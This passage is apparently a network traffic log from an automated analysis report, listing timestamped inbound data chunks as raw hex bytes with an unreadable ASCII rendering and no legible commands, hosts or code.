2023-11-18 09:02:39 UTC	1940	IN	Data Raw: b6 89 5a a9 fd f5 dc 8b 7f 0a 6d 53 2f 94 0f 8b ca a9 0b 59 35 83 08 ff 39 25 f6 59 1d fe ee f7 14 19 1e a3 41 13 e6 55 5d a2 94 b8 54 68 67 5f 17 1b 2f 15 2b 6f bd 57 ac c1 56 33 1b e2 ed 07 9e 47 55 20 0c bc 3b 5d ff 66 a4 34 76 75 59 b2 a5 ad de a8 ae fb 6a cf b7 b8 89 b3 a2 89 0b f9 46 f6 cd 67 da 85 b3 8d 2f bf f0 6e 21 6a 9c c2 d9 fa 9e 17 7e 29 46 f1 1e 0d 76 50 3a f7 c2 bb 0a fa 41 51 d4 6b 4c ec 44 04 ad 38 5e ce 8d ff 45 16 de e5 84 11 1f 7c cb cc ce bd 51 2b 3d 2e b6 5c cc ae 09 f9 55 70 58 ee 8d 06 ec 98 f7 d6 fb c5 46 b6 f6 70 7e e3 cc 13 58 84 df 1c 2f bc 03 d0 b5 ec db c2 9d 80 ad 41 d0 cf d6 ae 44 15 b8 92 d9 59 05 0e 88 60 fc 71 e3 e1 cb 67 fe aa 87 4a 1c a0 95 c8 37 af df 5f 1a 6b 62 d3 fc f8 8b fa f6 4a 26 7b fd 01 bc c9 14 f2 cd 88 ac Data Ascii: ZmS/Y59%YAU]Thg_/+oWV3GU ;]f4vuYjFg/n!j~)FvP:AQkLD8^E\|Q+=.\UpXFp~X/ADY`qgJ7_kbJ&{
2023-11-18 09:02:39 UTC	1956	IN	Data Raw: 51 25 b1 9a 13 c8 03 81 eb 44 97 46 b1 8d 25 d8 e8 aa 95 8f 35 e7 c7 12 86 f2 49 18 5e 22 88 d3 24 f2 8e 23 89 be ab 1d de bd 01 de 05 df 92 36 16 4e 61 65 93 68 d7 2f c2 37 e3 e1 ae d2 b6 58 92 05 a9 91 41 64 ba 8d de a1 b7 7b 07 5f 73 e9 fe 35 f6 b2 2b 51 ee 80 64 d7 70 ba c1 87 9e a9 63 e1 70 de 5a 00 ea 5e fa 7f dc 3d 7d 7c 14 45 96 dd 93 49 32 40 64 42 c4 33 8a 40 10 45 11 76 f9 34 18 93 1c a0 b6 ab ab 88 8b 46 77 85 28 9e 70 ea b1 51 0f 67 c0 0f 86 04 3a a3 69 87 59 b3 1e b8 89 46 37 ac b8 8b 6c f6 36 fa cb 71 23 9b 5d 26 24 92 ac cc ea 20 51 e6 d8 00 23 0c d2 c9 8c 9a 55 94 91 04 72 f5 5e 55 f5 74 f7 24 03 ba fb c7 fd ee 8f 64 ba bb aa 5e bd 7a 55 f5 5e bd 57 af 5e d1 cc b2 df 52 20 75 d9 9f 85 e1 47 b1 f2 63 c7 e9 ab 54 31 a1 40 8a ac 1c cb 12 34 Data Ascii: Q%DF%5I^"$#6Naeh/7XAd{_s5+QdpcpZ^=}\|EI2@dB3@Ev4Fw(pQg:iYF7l6q#]&$ Q#Ur^Ut$d^zU^W^R uGcT1@4
2023-11-18 09:02:39 UTC	1972	IN	Data Raw: 8c 0e 04 bb 37 d1 3f 9a b6 46 78 0e 41 5d 84 73 92 00 bd f6 0e d5 ac c4 ab f9 2f b3 91 db 90 89 38 3e e0 10 1c 26 e5 7e 8b a7 27 4a 18 af 23 37 1a 29 57 4a 94 bb 9d 28 97 42 0b f9 85 0e 46 b9 9a 1b 51 ba b0 00 53 63 02 53 66 02 23 f2 1a 7f 31 07 f4 18 37 ea 7e df 57 2d e1 66 52 7a b5 4a 7b 8b 8b 53 21 63 f2 22 b4 04 8d f8 24 16 d3 cd d0 61 be 63 49 f6 ee 2f df 8d c5 48 63 b7 a2 94 fd af 73 91 dd f3 b9 44 5d 6a 9d de cc 5a ef d3 d7 bf 1b d0 20 3c ca e7 00 0f 93 e1 ac 6d ee 20 bd 82 39 9a 6f 2a a7 19 cd 37 03 ae 31 7e e0 39 f4 81 77 32 3a 45 97 eb df d1 6c f1 1d 37 7c aa 7f c7 8a 59 20 2a 3b 42 e6 ed ed 3c 74 40 74 5d 8a ce 12 0d 8a 33 c3 be dd f1 96 4f 6b 58 e8 cd aa 12 2a 77 94 a5 d6 ed 89 c5 84 e9 39 8f dc 2b 12 f9 09 9b 7e 7f ab 8a fb 3f c8 74 0d e8 10 Data Ascii: 7?FxA]s/8>&~'J#7)WJ(BFQScSf#17~W-fRzJ{S!c"$acI/HcsD]jZ <m 9o71~9w2:El7\|Y ;B<t@t]3OkX*w9+~?t
2023-11-18 09:02:40 UTC	1988	IN	Data Raw: 44 52 75 db 77 5a a1 8a f4 b3 d0 73 8f b4 3c 98 ed 2a 94 24 7d 24 fc 9d 5e 51 dd 7a db 8d e8 cd 97 32 38 bd 8d 38 fd 43 c1 e9 ed c8 e9 fc 0b c0 e9 7e f8 c1 62 7f e9 b7 a9 8d bd dc fc 12 a7 0e c0 23 78 d2 9f 3e 13 62 e3 67 23 5a e2 40 ee 70 7b 82 57 07 49 06 d1 f7 77 6f e7 d4 04 79 45 dd a6 cf e2 76 e6 de ad b8 b7 f1 02 d0 94 d8 36 fd b5 98 8a 3b 28 c4 5f ac 72 09 9f c9 63 ee fd cc 73 00 b8 3a cb b7 62 ed 6a be 65 ab 6f d6 8a e7 5e 58 cb f7 70 c5 66 3d f7 c2 f2 e7 b9 3a e8 9f f5 d3 35 2f 2c e7 d6 6a 2f 38 57 3c cf 15 06 84 7d 7a fd b3 5c 6b c4 66 ad 5d e1 5d cf 07 67 fa 67 fd e3 f2 15 5e 86 b7 d2 ec 12 35 21 28 f7 0e 32 f7 9e f8 ad b8 b5 c4 03 44 ee 32 44 88 cc bd cc f3 8e e2 de ab 78 de d1 bb 9d ee a8 d3 d3 23 14 85 c1 1d 9a e0 69 16 ea ce e0 8e 4c f0 74 Data Ascii: DRuwZs<*$}$^Qz288C~b#x>bg#Z@p{WIwoyEv6;(_rcs:bjeo^Xpf=:5/,j/8W<}z\kf]]gg^5!(2D2Dx#iLt
2023-11-18 09:02:40 UTC	2004	IN	Data Raw: e8 6c 36 6b 5b 52 58 ee a0 eb 5a e8 12 33 db a1 89 9f 6a 06 dd 0e f5 e7 6a 31 9f 4d 1c 92 c4 e7 19 4c 2f 52 7f 26 2e b1 81 16 da a1 ab 0b 29 6c fc 10 fd fe 3d 50 37 f5 8d a1 5c c4 2c f6 47 54 64 f3 a2 84 12 fc e1 c8 22 cd 1e 88 84 3d 4a f3 a0 fe d5 4c 68 f9 a1 7e c3 f2 55 d9 c9 f9 8f 98 e0 d9 d5 84 6b 19 4e d1 4c 2e 5b 56 ae 38 f0 84 ce b0 1d 57 36 d4 68 27 ac 64 c2 08 05 f6 58 e2 92 b0 38 47 b4 51 e9 46 60 4c 81 79 cc 3b 13 fd bc 46 bc d7 83 32 d1 b2 15 6f ea 7c 6c 14 59 9e a4 6a 19 42 a9 63 cd c4 21 6c d2 3f 94 f7 2c 8b 25 cf 65 4a d8 3d 0a 31 8a 4b 62 4a 4c 81 49 46 79 d9 5e c2 bc 90 1d b9 55 59 9d 41 b4 7e db 6d 34 0f 03 33 84 ab f4 87 e8 69 1d 93 6e 2e c6 a9 b3 ea 38 3c 62 be 67 0e 75 79 ff 4a 84 76 08 9d 9d 1b b3 4d 98 70 0b ac 35 9b e2 20 c2 35 c0 Data Ascii: l6k[RXZ3jj1ML/R&.)l=P7\,GTd"=JLh~UkNL.[V8W6h'dX8GQF`Ly;F2o\|lYjBc!l?,%eJ=1KbJLIFy^UYA~m43in.8<bguyJvMp5 5
2023-11-18 09:02:40 UTC	2020	IN	Data Raw: e9 d8 9c 51 b0 a5 fb 4b e9 ba 4b 6b 3c a8 df 89 e9 76 a3 f1 f9 b6 7d b0 71 f3 1e 48 2d b7 8e dc 9c 39 18 d6 d7 dc 25 3d a8 5a 1b 26 86 bf c3 36 1f 87 a3 e6 d8 5d 1c 7a 7e 3b fa 47 16 4a e3 ea 0e 81 bf 47 9a c2 b9 e7 5b 31 73 d6 1c 98 f4 b4 35 ee bb 36 9b 6c fa eb 0d fa 4f 6a 8a 49 1d 29 3e 38 87 c0 f5 1a db 70 5a 9b 2f a4 7c ed fd d8 68 f1 03 f2 21 a1 26 5c 79 7f 45 1a b3 3d 03 b2 9f 9f 27 93 ab c4 e0 fd 9d 23 c0 fb fb 5a 78 b0 2b 08 5a ed 37 41 e7 a0 32 52 8f 76 ef 70 53 cc 1b 08 1f 1e 81 63 af 27 83 dd e4 0f 18 df e4 2c 19 f3 30 18 66 b9 6f c6 aa fe d5 71 f0 96 a1 e4 e5 dc 15 18 39 eb 01 16 ce ce c7 7a f7 bd 60 b9 66 31 5a 9c 0e 21 83 7a 8d 04 e1 c3 50 29 d3 5d 4d f9 d9 3b 69 cd dc 09 b8 fa 09 92 b0 cb dd f0 c5 9c 36 40 2a 1d 83 66 1b d6 91 5c 5f 2f b8 Data Ascii: QKKk<v}qH-9%=Z&6]z~;GJG[1s56lOjI)>8pZ/\|h!&\yE='#Zx+Z7A2RvpSc',0foq9z`f1Z!zP)]M;i6@*f\_/
2023-11-18 09:02:40 UTC	2036	IN	Data Raw: d3 d1 40 a7 8f 1c 48 41 e6 14 3c 1c a7 02 25 61 3f 54 49 fe 80 e6 cb be 84 81 bc 8b e0 6e e3 0a 7c 6d 28 0d 9c 2d 4c e1 95 c7 ca 68 86 84 2c ec 7c 7f 07 48 3d 58 04 56 82 03 e8 8e 3b 61 a0 71 3a 07 68 98 16 01 bb 96 f3 c8 ca 64 38 88 94 7d 05 6e d3 eb 82 f8 72 4a 94 25 21 0f f2 6f 73 87 62 8f 14 40 fd 19 53 d8 78 7c 0e bc bf d9 84 8e 9e 6a 84 fa 62 66 40 64 ec 0d 68 fa b1 0a 24 de 50 c3 81 e4 3b 48 ec e2 36 78 69 fa 10 7a 40 b4 09 1e bb c5 0a b9 ab cf 42 c9 c4 1f a0 dd 68 37 60 f1 94 00 47 94 00 38 76 c1 16 65 9d 6e 00 77 8d e7 40 be 5b 09 bc 6b c6 84 b0 dd 74 87 9f b6 bc 03 48 64 09 8c 7f 0b e0 a3 cf 9f 81 52 fd 12 98 a7 7b 08 5f 06 17 a0 77 a2 6d e1 cb 03 3d 20 82 7b 1a 4e 6e 69 83 5b cf cd c1 88 99 51 d4 c0 df 0c 38 52 cb a3 92 c3 9e 30 f3 19 1e 79 e8 Data Ascii: @HA<%a?TIn\|m(-Lh,\|H=XV;aq:hd8}nrJ%!osb@Sx\|jbf@dh$P;H6xiz@Bh7`G8venw@[ktHdR{_wm= {Nni[Q8R0y
2023-11-18 09:02:40 UTC	2052	IN	Data Raw: 18 68 bf a9 7b 31 b9 ed 64 a2 fd 6b ab 3c 0e 50 d8 dc f7 de a7 a8 3b 6c 7e f7 e3 18 ad a7 81 2d 5f 15 9b 84 f9 da 76 df ef 71 44 99 2b 42 ee c2 ca d8 6f 97 26 b8 66 3a fc c9 7f dc bc a9 9d 33 8a ef e1 8a 50 d8 f1 f6 d8 96 e3 89 2a 2a 62 db b6 88 4d ef a2 32 51 ff e1 fa 59 3e ef d5 f4 53 56 a9 2b 65 79 8c 79 82 07 65 33 9b 2e 45 5a 67 a4 ec 78 7b 5e 2d fb 84 87 d4 08 03 eb 44 e4 16 f4 b2 7e 6e 1f ff b6 97 2f 26 be fb 94 c0 f9 52 a1 4c 8a 8e 7b 46 f3 d2 42 bc 1c 6d 84 e7 19 e2 dd 5f 13 05 a7 1b ee 72 17 1d 90 a4 db 77 14 65 17 51 be b4 6d 53 e0 ab bc eb 94 b1 df f6 3c fe 5a a0 72 52 c6 c6 89 79 af c9 c5 3d 77 df 4e a6 72 71 39 5e d3 55 de ff 86 27 d4 b5 8b 65 91 b1 f2 87 6f ce f3 42 12 0d 75 bd 8b 52 cd dd 0c 75 91 0b 4d 09 75 ae 5b 5d 6f 3c ca 8e 1f 28 09 Data Ascii: h{1dk<P;l~-_vqD+Bo&f:3P**bM2QY>SV+eyye3.EZgx{^-D~n/&RL{FBm_rweQmS<ZrRy=wNrq9^U'eoBuRuMu[]o<(
2023-11-18 09:02:40 UTC	2068	IN	Data Raw: b5 6e 54 be f3 d2 a1 43 df 88 96 af b0 18 b1 f6 ee ac 2d 86 db 17 16 5b 14 5e 78 df 6f c7 ea b1 ef 7b 9f 98 b8 f7 5d 8f e9 99 09 dd 96 76 37 b9 5f 97 fc e3 6b a6 61 94 c1 c3 6f 7d 18 29 1e 85 fe ef 25 d9 99 3f 57 6f 55 cd 6d 7c 3b 7d ae 2d 31 3d 4f ed 16 e1 b7 66 ed c5 dc 89 fe 76 e7 a6 ed 7a 91 3c ee f8 e7 fe a5 c7 d7 b9 55 1e f0 89 70 2c f3 d3 35 aa e0 74 79 46 38 d9 1c dd 76 be c9 e4 9a 64 d3 f7 c6 b8 96 43 c9 fa 7b 9f 95 26 ce fd d0 39 eb fd 87 f2 a2 90 b9 2b 3f 9e cf c8 5d 2a 9d b0 7a b0 47 55 97 21 87 b7 d2 03 52 ee 54 5c d8 69 7b 79 e1 c1 9c 93 e8 f6 d3 b7 a2 37 45 6e b5 47 8d 57 55 b3 fa 2d c9 7c b2 34 d2 6c 4e b6 87 f5 bb f4 5b f9 2f f7 1a ee 7c 7e db f1 f6 c8 c6 21 b3 c5 ea 57 6b 5a 43 4d 47 6b ae 73 5d 97 5a d3 a9 53 14 6a e9 f1 c3 7b b4 e3 a4 Data Ascii: nTC-[^xo{]v7_kao})%?WoUm\|;}-1=Ofvz<Up,5tyF8vdC{&9+?]*zGU!RT\i{y7EnGWU-\|4lN[/\|~!WkZCMGks]ZSj{
2023-11-18 09:02:40 UTC	2084	IN	Data Raw: d1 94 c3 63 0a 84 e4 d5 0f 39 4a 22 90 90 b7 22 05 f8 7a 4d 76 fb 54 36 8c f8 b8 31 14 88 e5 7f 34 64 8e 78 6d 43 b2 5a d5 3e 64 c7 e0 33 b9 7c f2 ce ad 18 39 05 e1 e3 bd 4b 00 52 c2 71 f0 96 3f 6e ea 03 da cb bd ed 66 80 ec 10 c4 c3 4c b2 34 f0 00 79 87 48 fe 18 24 79 c4 46 19 31 f4 a2 0c 19 e4 53 5b 12 bc 62 f6 78 40 1d 5f 7b b7 fd c6 aa b8 1b 20 3f 8c 0d e4 37 78 0c a9 d1 e4 cf e3 d2 58 96 ec 9e 91 41 90 b7 27 1e 87 fc 71 95 8f 8c 15 24 28 7e 1d 50 cc 4a de f4 f6 f0 f1 0f c5 c7 59 34 97 a1 68 1b 79 62 d9 2f 93 62 b2 b9 25 5b 1a d9 9f 42 92 97 99 5c d9 63 84 06 21 7e 6e 6d 73 91 bf ef 92 d7 c5 b1 02 f9 b3 b9 b2 ff 50 41 24 8f 4d 5e f0 33 0c 82 7d fc 83 82 f0 44 01 f8 1c c8 fb db a9 02 14 53 21 74 2f da 1f 7d c5 d1 9d e7 8f ac 70 c4 e2 c8 c0 e1 8b b7 27 Data Ascii: c9J""zMvT614dxmCZ>d3\|9KRq?nfL4yH$yF1S[bx@_{ ?7xXA'q$(~PJY4hyb/b%[B\c!~nmsPA$M^3}DS!t/}p'
2023-11-18 09:02:40 UTC	2100	IN	Data Raw: e5 a4 90 cb 81 2f 3a a8 b5 ea 9c f2 c0 e9 a5 ea 9c 26 bf 19 6e c6 99 fd e6 88 b1 3a 45 85 f7 bc 9b a0 97 d0 1c f4 09 fa 1c d5 c5 0b c0 7b ad c5 9b f1 33 a4 16 ac cb 6f 64 01 7d 8b 95 80 34 bc 08 b8 fd a4 7d c1 2e 0c ae 1b 81 4e f5 73 86 38 29 fc 5d be 86 ef 81 64 f7 80 17 76 9f 74 6b bb 6d 81 e5 9b 7a 6d c2 d9 7e d1 9f e1 df 04 3e 77 80 cf 9b 67 ee 49 d9 21 6a ca 06 f2 92 bc 2e ab 40 4e 9e a9 56 02 87 45 e8 62 e1 be 8c ce 7a b4 4e 87 3c 95 d3 14 32 65 cd b3 c6 33 1d cc 28 48 07 a7 8d 95 12 65 25 87 1c d2 18 f5 40 23 d0 2b 68 05 da 86 f6 84 55 1a 8f 7b e1 d9 f8 53 9c 4a 96 92 28 ca c2 fd 25 cf d8 b5 81 4f c6 87 fb 07 4f 82 3f 97 ce 8b ce 51 c8 77 c5 dd 67 c1 27 4c 70 bf 74 9f 01 04 9c 13 c3 e5 c7 d2 d2 75 4c 3b d3 c5 a4 9a f7 cd 47 e1 3e 9f a8 e0 f6 ad 75 Data Ascii: /:&n:E{3od}4}.Ns8)]dvtkmzm~>wgI!j.@NVEbzN<2e3(He%@#+hU{SJ(%OO?Qwg'LptuL;G>u
2023-11-18 09:02:40 UTC	2116	IN	Data Raw: 8e b3 8d 3e 74 84 39 be 06 b3 15 0e c5 10 80 02 b4 75 01 0a 0b 6e f1 7f 79 3a 49 10 6f 3d cd 97 f6 71 05 fe 4c 7c 8c 4e 5d 7a 27 f8 23 b6 59 99 7a 21 76 49 aa 3f 6a 49 71 7b b6 cb ca aa 7e fe 85 24 cd 79 24 93 3b a7 9a 24 df d5 ef cd 44 0c 5b 73 33 26 29 01 2b cf 4c 02 53 02 aa 23 e8 81 dc c3 5e 52 29 a8 b5 19 7e aa c3 f0 b8 6a d8 57 fd f6 27 62 14 1e a6 7d 68 f7 14 55 47 68 19 b2 f6 33 e5 03 d5 53 78 b3 73 f1 90 60 6f 02 d9 eb fb d1 87 fc 8c 1a 0c 05 e3 1c 32 c4 3b a3 5a 8a 90 53 28 63 f5 82 ce 87 06 cf 95 3e 6e b5 0a 72 9f 37 51 c8 bd b9 c9 34 0d 62 12 31 fe 96 73 06 ec 92 1a 41 79 b3 92 8d 12 24 1f ba 18 0e 8b 3b 4e c1 cc d8 d7 d4 cb ee be bd b9 49 14 7c 78 49 7b 2b 51 90 95 22 8d 1c be 1a 0d 7c 7a 71 c1 46 12 f8 5a 1f 51 e8 7d 4c ae c9 6c e0 26 5a 5c Data Ascii: >t9uny:Io=qL\|N]z'#Yz!vI?jIq{~$y$;$D[s3&)+LS#^R)~jW'b}hUGh3Sxs`o2;ZS(c>nr7Q4b1sAy$;NI\|xI{+Q"\|zqFZQ}Ll&Z\
2023-11-18 09:02:40 UTC	2132	IN	Data Raw: 8e 47 26 5b 23 34 6b db ed 88 c7 02 ea 41 7e 30 8e d1 f4 2a 9c 7b f8 34 7c 37 31 5d ea 18 50 a3 0f eb 3d 61 f2 2e 3f 61 b2 ad d9 7b 3e 2c df c5 85 37 7a 0b e9 12 38 79 56 33 ab b5 9d cb ca 1f 84 14 ba e2 b4 39 b1 f9 3e 24 32 e8 fb 7f 54 3f 2f e7 d8 bc 78 58 ef af 60 71 a9 b7 3e 08 df ff 23 98 f8 c9 a4 2c ef 69 75 8f c3 e2 34 ba 0e 03 c4 52 a8 93 38 7e d9 75 34 7e c1 5e c6 ef 9a 42 2b 7e b8 7d 0f d3 47 8e 74 b6 61 c4 11 04 ff a2 4e 8d b0 b3 07 fc 4e fe 48 e4 09 df 6c 63 ed c3 0f 36 f7 b5 3f c8 23 0e 33 7f 37 c4 34 7b 00 d9 b8 02 da d7 fe 24 de 72 4d 68 76 76 ce 44 56 ec 24 92 da 85 e3 c3 42 d4 94 b9 05 2f b6 4e e1 ec 32 f1 02 38 8e 77 39 f0 ed ae f0 b7 47 d3 db 43 34 67 b2 2e e1 ed d8 0b 61 1c d1 f9 7a 94 8d 20 ac 2c e0 d8 1c d5 d5 ce 56 f9 26 a9 0e 23 ec Data Ascii: G&[#4kA~0*{4\|71]P=a.?a{>,7z8yV39>$2T?/xX`q>#,iu4R8~u4~^B+~}GtaNNHlc6?#374{$rMhvvDV$B/N28w9GC4g.az ,V&#
2023-11-18 09:02:40 UTC	2148	IN	Data Raw: f9 11 27 29 06 3c 7f 38 c5 67 27 79 c3 63 54 27 22 9d 96 98 78 88 7d 2c 38 6f b8 09 2c 3e fe 47 ae be d5 eb 8c f1 60 d9 41 f1 e0 64 78 38 f5 29 d8 bf af 0b b6 fa 5e 58 67 bc fa 78 33 85 ac 99 4f a0 99 6e eb 02 36 81 c7 ff 7b 25 9b 40 e6 51 dd 26 b0 39 70 f9 9d 3c da e6 26 30 e1 84 b0 fc 36 87 bc 09 1c 6e d6 6d 02 63 75 dd ce 3c 1a 7c 13 38 7d 5c 58 79 63 8d 36 81 2a ff ef db 04 7e 5a 6b 8c fe 44 86 fe 45 0c fd 29 ab e1 fe 73 ad b2 09 ac fe fd 9b 40 17 ff 1f 49 86 3d d7 1a 93 e1 bd 6c 00 ab d8 00 5e fa 84 0c e0 fb 35 c1 c8 f0 fb 35 c6 78 e0 cd 7c c2 9a 49 82 66 de 5d 63 6d 9f d3 9f 3a a2 e3 f4 06 a4 36 57 6e 93 d3 5f f4 1b 93 9a ca 73 d3 14 9e ab e7 f4 7f 3b 22 f0 5c 23 7a b3 ca 02 cf d5 71 fa 02 bf 01 bd 05 f0 dc 6f bf 0e c6 73 fb 36 07 3f 1e 89 2f 78 29 Data Ascii: ')<8g'ycT'"x},8o,>G`Adx8)^Xgx3On6{%@Q&9p<&06nmcu<\|8}\Xyc6*~ZkDE)s@I=l^55x\|If]cm:6Wn_s;"\#zqos6?/x)
2023-11-18 09:02:40 UTC	2164	IN	Data Raw: d8 57 ed 87 be 64 60 87 ad ba c4 de b1 4b b1 70 44 37 ef 59 97 c3 2f 03 a7 6b 7b 70 07 43 75 ad 5e 23 53 c5 be a8 d3 aa 62 af 88 e7 58 55 ec a3 23 56 0e f4 d8 19 57 9a 8a 5d 50 5e 16 77 49 2e 54 34 48 53 81 2b 90 cb d3 6b 9b 5d ab b7 a6 32 bc b3 70 ab a7 36 51 a1 a0 a5 42 0f 9f b1 54 68 76 a7 95 42 1f c5 32 55 e8 3f ce c8 0a dd 9d a3 28 fd 52 c1 cd 54 78 e8 6f 09 2a 3c 65 a9 c2 ce 98 a5 0a ab 3b ac 54 c8 ce 58 85 75 31 59 85 97 5d 30 71 52 06 f8 52 15 3f e8 24 0c 66 45 55 6f 93 f9 34 a4 27 f8 ba e4 97 85 58 ac 96 9e 2b 7e b3 21 d3 55 45 fe 21 02 d1 3d d0 be ba c5 af a1 54 e9 18 8b d1 9f bf fb e7 8b d1 90 98 2b 59 31 e2 4d b1 43 8b 54 e0 09 e7 52 c2 c3 c3 32 6f 0c b3 0f a5 6e 0c 17 51 63 f8 f3 03 ac 31 7c e7 60 ff 1a c3 a2 66 53 63 e8 a9 6a 1e 68 2e ff fc Data Ascii: Wd`KpD7Y/k{pCu^#SbXU#VW]P^wI.T4HS+k]2p6QBThvB2U?(RTxo*<e;TXu1Y]0qRR?$fEUo4'X+~!UE!=T+Y1MCTR2onQc1\|`fScjh.
2023-11-18 09:02:40 UTC	2180	IN	Data Raw: 22 2a d0 6c d9 75 d7 6c a7 be fd a9 bc 27 de 07 6f dd 37 82 de ed 86 c5 d6 c9 37 ad c9 be 11 3b 85 db bb ad a8 f5 a3 5a db 0e fa 23 22 09 eb e4 a7 f4 a0 19 80 c3 68 0f 8f 04 9a 9e 77 47 cd 4d 7b da 1d 7d 8e e5 17 3e 1e 23 ec 52 bb fb 90 36 d9 20 96 33 d1 e7 7f fc f1 20 e2 4e e6 a2 27 bb 7d 75 1d d6 fd b3 ca 5f 3e 3d 46 28 61 32 96 3d ce 7f d4 2c dc 65 39 67 05 01 6a 96 db 48 78 93 ff 38 2b 59 aa dd a8 9f b6 41 ea cb 42 00 a8 7c bc 0f 7d 6b a1 07 d9 7f 9e ba 25 81 9c 82 fd eb 93 36 9d 72 a9 78 88 dc dd 4a b0 92 fa 08 75 c1 65 99 9b 82 f1 10 5b 53 2b de 13 d4 e0 77 d2 7b 31 15 e1 9e 09 99 b1 14 e1 c7 88 cc 83 8d 70 2e 90 3e 2b ba 26 3c 09 e1 af fc 91 32 f2 47 db fe 09 19 b9 6a 5b 74 52 f4 14 75 b2 c3 b0 f8 c5 63 db 8c 26 88 67 d7 3f 32 1b 65 21 79 fb 3b 89 Data Ascii: "*lul'o77;Z#"hwGM{}>#R6 3 N'}u_>=F(a2=,e9gjHx8+YAB\|}k%6rxJue[S+w{1p.>+&<2Gj[tRuc&g?2e!y;
2023-11-18 09:02:40 UTC	2196	IN	Data Raw: 64 e1 37 68 80 1d 0d 2c 77 88 69 d0 d4 ae eb cc ed c9 f3 68 7f bf 6e 43 fa f9 e8 6a 59 52 4e bc 12 2a 68 ea 89 57 cc af 99 18 98 73 14 4c 02 80 f1 bc 02 da fe 3a 7d 14 af 9e 07 54 a1 7e 08 39 48 6c 83 bf ca db 6f e3 46 97 49 62 46 35 d9 4a 21 1a a2 cf d3 0e 5e 7a 1c 0d a6 07 ff da 74 82 6e af 89 a0 59 f3 b4 0c 71 c2 ae a0 b1 f8 60 65 dd 3d 64 45 c9 23 79 15 b3 19 da f0 34 5b 59 2f 58 78 a0 b1 f9 a4 3b 5e 57 73 3b db 5f 8f e4 9f c8 9e 79 10 0f 96 95 27 bf 29 ac ed dd 6d 08 bd f8 82 58 10 b4 e3 ca 2d f7 70 b2 48 6d a5 d1 c4 a7 19 b5 42 70 8b b5 b4 31 5d 0c 39 34 1d 18 3f 1c c3 70 42 da 75 62 e5 86 ea 91 4b dd d1 67 98 dc 8a d4 b0 13 b5 35 bb 0f 79 8a 4a 8d 70 c6 b2 7f 2d d9 1d 00 7a 6a 04 38 ee d4 a3 e3 ce 5c 36 c8 64 fa 66 00 ca 1a 86 2e 9b 09 6f f3 9e 92 Data Ascii: d7h,wihnCjYRN*hWsL:}T~9HloFIbF5J!^ztnYq`e=dE#y4[Y/Xx;^Ws;_y')mX-pHmBp1]94?pBubKg5yJp-zj8\6df.o
2023-11-18 09:02:40 UTC	2212	IN	Data Raw: 80 31 dd 1c f3 18 1e e1 6d 88 58 23 8d cf cb 90 12 87 b4 b3 cf d9 a4 20 e7 f6 5c 3d b7 01 05 6b d3 e5 fb 4f 5b c9 51 3f d8 30 c1 02 ad dd d4 d1 ee 95 79 f6 d5 09 7c 1e c0 b9 18 f2 78 e4 ed c2 20 ae da a3 27 b3 8f 47 d7 f1 df e6 67 3b 7b 91 9f 05 22 a5 c5 a9 5b e9 ca 20 67 8e 94 cd c1 0a 69 1a b5 2c 71 fe 7f d3 31 4f 0d 48 5e 70 f3 60 f2 3b a5 6b 3b f3 49 82 9e ae 4d 8f 81 74 23 3c 0b 3f 41 4d 74 78 32 b6 88 c4 45 59 90 bc 0e 9b ae 3a 09 37 e0 59 bc a9 36 d9 d6 15 a2 fe 53 14 4e b2 7b 65 a6 92 ba 12 a7 a3 17 6e 2d cb f8 72 fd a2 31 41 d3 a6 0a cc 6c 35 b8 33 5b d9 f7 30 b6 7a d2 c2 57 a8 33 06 01 f6 d3 d2 bc b0 2d 0a 76 eb 89 7c b7 e6 5f a0 ee 99 1d e3 8f 35 3a e0 dd 2f 3d 0b 06 fd 94 18 f4 45 c2 fd 75 ab 2c 05 71 da db f8 27 c8 46 3c a9 47 a6 51 36 e0 55 Data Ascii: 1mX# \=kO[Q?0y\|x 'Gg;{"[ gi,q1OH^p`;k;IMt#<?AMtx2EY:7Y6SN{en-r1Al53[0zW3-v\|_5:/=Eu,q'F<GQ6U
2023-11-18 09:02:40 UTC	2228	IN	Data Raw: 89 d0 0e e5 90 3c 92 04 b6 e5 06 cf 8d 4c 39 5a 4f 3e 26 e2 04 a7 0d de ac 5d a7 81 16 70 17 4f 15 70 e1 6a fc 8c 89 90 63 0c 0b e6 1c c4 ba fc b8 14 25 43 2b 07 29 5b bd 7b 9d a9 70 6c 7d 60 b2 54 38 96 53 9d 20 f9 e3 25 e3 6e f4 2d c4 30 2e 9a f7 4f 2e 5c 7d 5d 02 8e 8d 98 74 16 ff c2 31 ef 21 84 b1 df 76 38 fb 2e db e1 33 9e ff 81 fb f8 05 d3 db b3 21 ef ae fa 96 dc 4f b7 7d 00 27 79 c4 53 e9 fe 42 b8 5f ec 48 a9 70 3a 1c 9e 2a f8 90 31 22 c9 53 9b c3 49 37 e4 7c 56 f6 5f b8 7f bf 8c 87 54 05 6b 90 f2 26 38 33 43 ca ad c0 70 b5 49 50 be 9f 4f 56 d8 e5 1c 4f 6e a1 d7 7a 3c 71 de 04 45 48 f0 bd 52 27 4c fc 1e c4 b7 e8 d2 50 cf 8e cc e5 5e 41 38 3e 2c 34 2e b2 ad 99 78 6d ab 3c 8e 65 bc ef a2 06 5e b9 2a 56 71 e1 84 60 a1 89 00 de 74 e2 9b 9f 9d 05 0d 1d Data Ascii: <L9ZO>&]pOpjc%C+)[{pl}`T8S %n-0.O.\}]t1!v8.3!O}'ySB_Hp:1"SI7\|V_Tk&83CpIPOVOnz<qEHR'LP^A8>,4.xm<e^Vq`t
2023-11-18 09:02:40 UTC	2244	IN	Data Raw: e8 94 2d ca 2a 78 59 65 82 6e 7d 10 1b 60 27 50 10 91 81 8b 48 ec 2d 3c b5 90 f7 e3 f9 98 04 27 ff 24 d7 f5 18 27 79 27 42 56 84 81 5d 8d 05 86 65 5b 83 18 13 bd e0 cb 38 28 08 88 1d 70 cc 89 0b 27 27 a7 f4 f2 67 96 43 70 87 a2 cc 26 38 8f 16 65 82 8b 55 52 51 66 05 f7 2d 8a 33 9f 73 6f bf de d4 39 9a 6e 81 0e 60 ef cc 3c 81 bd 0d 70 16 d4 f2 1a bd 90 78 0b ff e5 cf 70 a5 3b cb 5d 63 b5 5f 14 e8 b6 5c 10 fc 90 2f 8d ad 58 89 40 57 cd 73 08 68 ec 94 9e e5 d2 b2 0a e1 91 45 00 f6 36 31 0e c0 b5 98 7e 7b ab 27 0b ae 5c 72 5e 8f 1d 87 b2 d7 09 d0 f0 86 0e 34 1c a3 35 cc e0 91 6b 03 78 33 44 f9 b3 55 5f 56 0c 18 87 67 c5 81 53 43 56 02 e7 c3 e3 f3 fc 7c 81 0b b6 0f 1e 27 f2 7b 73 01 bc 0b c3 3a 5b b9 6d 89 01 